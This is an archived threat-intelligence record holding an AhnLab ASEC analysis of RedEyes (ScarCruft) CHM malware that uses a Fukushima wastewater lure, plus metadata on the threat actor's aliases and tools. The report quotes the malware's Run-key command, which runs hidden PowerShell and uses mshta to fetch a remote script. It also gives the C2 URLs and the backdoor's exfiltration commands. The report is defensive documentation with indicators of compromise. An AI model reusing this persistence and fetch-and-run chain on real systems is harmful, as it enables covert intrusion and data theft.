{
	"id": "e413c0aa-3d9b-4253-a5be-198d21b28fac",
	"created_at": "2026-04-06T00:06:35.22026Z",
	"updated_at": "2026-04-10T03:38:06.308367Z",
	"deleted_at": null,
	"sha1_hash": "fa4e301dec9716a95a79b83e614cd411330b9219",
	"title": "RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1147237,
	"plain_text": "RedEyes (ScarCruft)’s CHM Malware Using the Topic of\r\nFukushima Wastewater Release - ASEC\r\nBy ATCP\r\nPublished: 2023-09-03 · Archived: 2026-04-05 19:10:03 UTC\r\nThe AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM\r\nmalware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The\r\nCHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email\r\nfrom a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in\r\nthe “2.3. Persistence”[2] stage in the attack process of the RedEyes group’s M2RAT malware’.\r\nThe recent attack used information regarding the release of Fukushima wastewater. By using such a spotlight issue\r\nin Korea, the threat actor provokes the user’s curiosity and leads them to open the malicious file. Information\r\nabout this issue can be seen in the help file window generated when the CHM malware is executed, as shown in\r\nFigure 1.\r\nhttps://asec.ahnlab.com/en/56857/\r\nPage 1 of 5\n\nFigure 2 shows the malicious script that operates during this process. The mshta command used to be executed\r\ndirectly by the CHM file (hh.exe), but the recently distributed file registers the command to the RUN key enabling\r\nit to be run when the system reboots.\r\nRUN key registration\r\nRegistry path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: fGZtm\r\nValue: c:\\windows\\system32\\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -\r\nep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html\r\nWhen the command registered to the RUN key is executed, an additional script at a certain URL runs through\r\nmshta. The said URL contains a JavaScript (JS) code. This code is responsible for executing an encoded\r\nPowerShell command. This process is similar in structure to the commands used in the attack process of\r\npreviously covered CHM malware and M2RAT malware.\r\nhttps://asec.ahnlab.com/en/56857/\r\nPage 2 of 5\n\nThe decoded PowerShell command is a backdoor responsible for registering the RUN key to establish persistence,\r\nreceiving commands from the threat actor’s server, and transmitting the command execution results. It receives\r\ncommands from the threat actor’s server, and according to the commands, can perform various malicious\r\nbehaviors such as uploading/downloading files, transmitting information on specific files, and editing the registry.\r\nC2\r\nhxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Computer name]-[User name] //\r\nReceive the threat actor’s command\r\nhxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 encoding] // Transmit the\r\ncommand execution results\r\nhttps://asec.ahnlab.com/en/56857/\r\nPage 3 of 5\n\nCommand Feature\r\nfileinfo\r\nSaves the list of files and their properties (name, size, last modified time) in a\r\ncertain path as CSV, transmits this file to the C2 server, then deletes it from the\r\nlocal system\r\ndir\r\nCompresses folders in a certain path, transmits them to the C2 server, then\r\ndeletes them from the local system\r\nfile Sends (uploads) a certain file to the C2 server\r\ndown Downloads files in a certain path\r\nregedit Edits the registry\r\ntask Adds a task to the Task Scheduler to be repetitively run at 10-minute intervals\r\nzip Decompresses a compressed file in a certain path\r\nrename Changes the name of a certain file\r\ndel Delete files in a certain path\r\nTable 1. List of commands received\r\nWhen a system is infected with this type of malware, the system can suffer great damage since this malware is\r\ncapable of performing various malicious acts such as downloading additional files and breaching data according to\r\nthe threat actor’s commands. In particular, malware that targets users in Korea may include information on topics\r\nof interest to the user to encourage them to execute the malware, so users should refrain from opening emails from\r\nunknown sources and should not execute their attachments. Users should also regularly scan their PCs and update\r\ntheir security products to the latest engine.\r\n[File Detection]\r\nDownloader/CHM.Generic (2023.09.02.00)\r\nMD5\r\n52f71fadf0ea5ffacd753e83a3d0af1a\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//navercorp[.]ru/dashboard/image/202302/4[.]html\r\nhttp[:]//navercorp[.]ru/dashboard/image/202302/com[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\nhttps://asec.ahnlab.com/en/56857/\r\nPage 4 of 5\n\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/56857/\r\nhttps://asec.ahnlab.com/en/56857/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/56857/"
	],
	"report_names": [
		"56857"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433995,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa4e301dec9716a95a79b83e614cd411330b9219.pdf",
		"text": "https://archive.orkl.eu/fa4e301dec9716a95a79b83e614cd411330b9219.txt",
		"img": "https://archive.orkl.eu/fa4e301dec9716a95a79b83e614cd411330b9219.jpg"
	}
}